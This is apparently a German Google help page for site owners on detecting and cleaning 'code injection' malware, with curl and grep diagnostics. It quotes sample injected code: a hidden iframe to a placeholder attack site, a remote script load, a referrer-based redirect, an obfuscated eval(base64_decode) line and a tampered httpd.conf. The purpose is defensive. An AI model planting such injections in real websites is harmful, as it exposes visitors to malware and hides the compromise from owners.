Typ der Malware-Infizierung: Code-Einschleusung

Was bedeutet es, wenn Seiten mit dem Malware-Infizierungstyp "Code-Einschleusung" in der Google Search Console markiert sind?

Dies bedeutet, dass Seiten Ihrer Website modifiziert wurden, sodass sie schädlichen Code enthalten, wie z. B. ein iFrame zu einer Website für Malware-Angriffe.

Weitere allgemeine Informationen zu Malware finden Sie unter Schadensbeurteilung (Malware).

Wie untersuche ich den Malware-Typ "Code-Einschleusung"?

Zunächst vermeiden Sie, einen Browser zum Aufrufen von infizierten Seiten Ihrer Website zu verwenden. Da Malware sich oft über Schwachstellen in Browsern ausbreitet, könnten Schäden an Ihrem Computer auftreten, wenn eine mit Malware infizierte Seite in einem Browser geöffnet wird.

Sie können das Verhalten überprüfen, indem Sie mit cURL oder Wget HTTP-Anfragen (z. B. um eine Seite aufzurufen) durchführen. Diese kostenlos verfügbaren Tools helfen bei der Diagnose von Weiterleitungen und können sowohl Informationen zum Referrer als auch zum User-Agenten beinhalten. Dadurch, dass schädliche Inhalte nur an Nutzer mit spezifischen User-Agenten oder Referrern gesendet werden, können Hacker mehr "echte Menschen" erreichen und vermeiden, von Websitebetreibern und Malware-Scannern erkannt zu werden. Ihre Website muss online sein, damit Sie diese Tools verwenden können.

Beispiel:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
z. B.
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://ihremusterdomain.de/page.html

Als nächstes melden Sie sich in Ihrem Dateisystem an. Untersuchen Sie alle Ressourcen, die an die mit eingeschleustem Code infizierten URLs schreiben. Hier sind einige Beispiele für die Einschleusung von schädlichen Codes:

<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://malware-attack-site/");
  }
</script>
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
  • iFrame an eine Angriffswebsite
  • JavaScript oder eine andere Skriptsprache, die Skripts von einer Angriffswebsite abruft und ausführt
  • Skripts, die den Browser auf eine Angriffswebsite weiterleiten
  • Schädlicher Code, der verschleiert ist, um nicht entdeckt zu werden
  • Dateien mit gemeinsam genutzten Objekten, die erstellt wurden, um willkürlich schädlichen Code in ansonsten harmlose Skripts zu schreiben

Untersuchen Sie alle potenziell schädlichen Codestellen, die auf der Website vorhanden sind. Es ist empfehlenswert, nach Wörtern wie [iframe] zu suchen, um Iframe-Code ausfindig zu machen. Weitere hilfreiche Schlüsselwörter lauten "script", "eval" und "unescape". Zum Beispiel auf Unix-basierten Systemen:

$grep -irn "iframe" ./ | less

Wie bereinige ich meine Website vom Malware-Typ "Code-Einschleusung"?

Falls Sie Ihre Website bereinigen möchten, können Sie entweder die betroffenen Dateien durch die letzte saubere Sicherung ersetzen oder den eingeschleusten Code von jeder Seite und aus allen zugehörigen Skriptfunktionen oder Dateien entfernen. Wenn Sie Konfigurationsdateien des Servers geändert haben, müssen Sie Ihren Webserver eventuell neu starten, damit die Änderungen wirksam werden.

Beachten Sie, dass das Entfernen des schädlichen Codes nicht die zugrunde liegende Schwachstelle beseitigt, die es dem Hacker ermöglicht hat, Ihre Website zu gefährden. Ohne Behebung der Ursache könnte Ihre Website in Zukunft wieder angegriffen werden. Weitere Informationen zum Bereinigen einer gesamten Website von diesem und anderen Malwaretypen finden Sie unter Hilfe für gehackte Websites.

War das hilfreich?
Wie können wir die Seite verbessern?